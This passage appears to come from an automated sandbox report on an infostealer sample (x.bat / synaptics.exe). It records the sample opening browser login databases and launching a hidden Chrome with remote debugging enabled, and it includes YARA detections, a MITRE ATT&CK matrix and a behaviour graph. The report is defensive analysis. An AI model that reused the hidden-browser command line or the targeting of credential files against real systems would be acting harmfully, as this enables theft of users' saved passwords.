                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\request.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\__pycache__\request.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\__pycache__\request.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\request.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\request.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\request.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\urllib\__pycache__\request.cpython-310.pyc.25322400 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\bisect.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\bisect.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\bisect.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\bisect.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\bisect.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\bisect.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\bisect.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\bisect.cpython-310.pyc.29937136 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\email\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\email\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\email\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\email\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\email\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\email\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\email\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\email\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\email\__pycache__\__init__.cpython-310.pyc.25324192 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\hashlib.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\hashlib.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\hashlib.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\hashlib.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\hashlib.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\hashlib.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs\_hashlib.pyd VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\http\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\http\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\http\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\http\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\http\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\http\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\http\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\http\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\http\__pycache__\__init__.cpython-310.pyc.25323520 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\http VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\http VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_00CA15EB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,24_2_00CA15EB
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6C621BF0 Py_GetVersion,PyOS_snprintf,PyOS_snprintf,27_2_6C621BF0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000018.00000002.3066959428.00000000038D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000003.2786624765.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000003.2785465597.0000000003AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.3077126094.0000000004870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.3067343152.0000000003AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.3071266384.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000003.2805121636.0000000003AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                Remote Access Functionality

                barindex
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                Source: Yara matchFile source: 00000018.00000002.3066959428.00000000038D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000003.2786624765.0000000003ACB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000003.2785465597.0000000003AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.3077126094.0000000004870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.3067343152.0000000003AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.3071266384.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000003.2805121636.0000000003AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0F1C00 sqlite3_bind_null,24_2_6C0F1C00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C197C00 memset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,24_2_6C197C00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C17AC30 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,24_2_6C17AC30
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0F1C40 sqlite3_bind_pointer,24_2_6C0F1C40
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C17CCA0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,24_2_6C17CCA0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C181CA0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_value_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_initialize,memmove,sqlite3_initialize,memmove,memmove,sqlite3_initialize,memmove,sqlite3_initialize,memmove,24_2_6C181CA0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0F1CD0 sqlite3_bind_text,24_2_6C0F1CD0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C17FD00 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_step,sqlite3_finalize,24_2_6C17FD00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C170D40 sqlite3_value_int64,sqlite3_value_int64,sqlite3_value_int,sqlite3_initialize,sqlite3_free,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,24_2_6C170D40
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C16DDB0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,24_2_6C16DDB0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C182DB0 sqlite3_bind_int64,sqlite3_step,24_2_6C182DB0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0F1DB0 sqlite3_bind_text64,24_2_6C0F1DB0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C183DF0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_value_blob,sqlite3_initialize,sqlite3_initialize,memmove,sqlite3_initialize,memmove,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,24_2_6C183DF0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C193DE0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,24_2_6C193DE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0F1DF0 sqlite3_bind_text16,24_2_6C0F1DF0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C185E30 sqlite3_bind_int64,sqlite3_step,sqlite3_value_blob,memmove,24_2_6C185E30
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C186E50 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,24_2_6C186E50
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C16FE60 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,memset,sqlite3_initialize,sqlite3_finalize,24_2_6C16FE60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C17AED0 sqlite3_bind_int64,sqlite3_step,24_2_6C17AED0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0F1ED0 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,24_2_6C0F1ED0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C194F50 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,24_2_6C194F50
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C17CF60 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_free,sqlite3_bind_text,sqlite3_step,sqlite3_reset,24_2_6C17CF60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C182F80 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_step,24_2_6C182F80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C194FA0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,24_2_6C194FA0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C193FE0 sqlite3_value_double,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,memset,memset,sqlite3_initialize,memset,memmove,24_2_6C193FE0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C17B8B0 sqlite3_value_int64,sqlite3_value_int,sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,24_2_6C17B8B0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C180920 memset,sqlite3_initialize,memset,sqlite3_bind_int64,sqlite3_step,sqlite3_value_blob,24_2_6C180920
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C17F940 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_free,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,24_2_6C17F940
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0F19C0 sqlite3_bind_blob,24_2_6C0F19C0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C17FA30 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,memset,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,24_2_6C17FA30
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C185A50 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_step,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_log,24_2_6C185A50
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0F1A60 sqlite3_bind_blob64,24_2_6C0F1A60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C199A80 sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_initialize,memmove,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,24_2_6C199A80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C17DAF0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,24_2_6C17DAF0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0F1B00 sqlite3_bind_double,24_2_6C0F1B00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C17EB00 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,sqlite3_bind_int64,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,sqlite3_bind_int64,sqlite3_step,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,24_2_6C17EB00
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0F1B60 sqlite3_bind_int,sqlite3_bind_int64,24_2_6C0F1B60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0F1B80 sqlite3_bind_int64,24_2_6C0F1B80
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C0EFBA0 sqlite3_value_frombind,24_2_6C0EFBA0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C183410 sqlite3_bind_int64,sqlite3_step,sqlite3_initialize,sqlite3_step,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,24_2_6C183410
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 24_2_6C1965E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,24_2_6C1965E0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F707A60 PyEval_SaveThread,sqlite3_bind_parameter_count,PyEval_RestoreThread,PySequence_Check,PyEval_SaveThread,sqlite3_bind_parameter_name,PyEval_RestoreThread,PyUnicode_FromString,PyDict_GetItemWithError,PyObject_GetItem,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,PyErr_Occurred,PyErr_Occurred,PyExc_LookupError,PyExc_LookupError,PyErr_ExceptionMatches,PyErr_Format,PyErr_Format,PyExc_ValueError,PyExc_ValueError,PyErr_SetString,PySequence_Size,PyErr_Format,PyList_GetItem,PySequence_GetItem,_Py_Dealloc,_Py_Dealloc,PyErr_Occurred,PyErr_Format,27_2_6F707A60
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F7078A0 sqlite3_bind_null,PyFloat_Type,PyFloat_Type,PyType_IsSubtype,PyObject_CheckBuffer,PyObject_GetBuffer,PyExc_ValueError,PyExc_ValueError,PyErr_SetString,sqlite3_bind_blob,PyBuffer_Release,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyFloat_AsDouble,PyErr_Occurred,sqlite3_bind_double,PyErr_Occurred,sqlite3_bind_int64,27_2_6F7078A0
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F912650 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct,27_2_6F912650
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeCode function: 27_2_6F912E40 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct,27_2_6F912E40
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts1
                Native API
                1
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                Data Encrypted for Impact
                CredentialsDomainsDefault Accounts12
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                Extra Window Memory Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                File and Directory Discovery
                Remote Desktop Protocol1
                Data from Local System
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                PowerShell
                21
                Registry Run Keys / Startup Folder
                11
                Process Injection
                2
                Obfuscated Files or Information
                Security Account Manager26
                System Information Discovery
                SMB/Windows Admin Shares1
                Email Collection
                21
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Registry Run Keys / Startup Folder
                1
                Install Root Certificate
                NTDS21
                Security Software Discovery
                Distributed Component Object ModelInput Capture1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                Process Discovery
                SSHKeylogging3
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Extra Window Memory Injection
                Cached Domain Credentials21
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture4
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555120 Sample: x.bat Startdate: 13/11/2024 Architecture: WINDOWS Score: 100 94 api.telegram.org 2->94 96 www.google.com 2->96 98 5 other IPs or domains 2->98 112 Suricata IDS alerts for network traffic 2->112 114 Yara detected Powershell download and execute 2->114 116 Yara detected Telegram RAT 2->116 120 5 other signatures 2->120 12 cmd.exe 1 2->12         started        14 explorer.exe 2->14         started        16 explorer.exe 1 2->16         started        18 2 other processes 2->18 signatures3 118 Uses the Telegram API (likely for C&C communication) 94->118 process4 process5 20 mshta.exe 14 12->20         started        22 conhost.exe 12->22         started        24 chcp.com 1 12->24         started        26 synaptics.exe 14->26         started        30 synaptics.exe 16->30         started        dnsIp6 32 cmd.exe 1 20->32         started        108 ip-api.com 208.95.112.1 TUT-ASUS United States 26->108 130 Tries to harvest and steal browser information (history, passwords, etc) 26->130 34 msedge.exe 26->34         started        37 taskkill.exe 26->37         started        39 taskkill.exe 26->39         started        41 chrome.exe 26->41         started        43 taskkill.exe 30->43         started        45 chrome.exe 30->45         started        signatures7 process8 file9 47 powershell.exe 32->47         started        50 powershell.exe 14 28 32->50         started        54 cmd.exe 1 32->54         started        66 8 other processes 32->66 82 C:\Users\user\AppData\Local\...\Login Data, SQLite 34->82 dropped 56 msedge.exe 34->56         started        58 conhost.exe 37->58         started        60 conhost.exe 39->60         started        62 conhost.exe 43->62         started        64 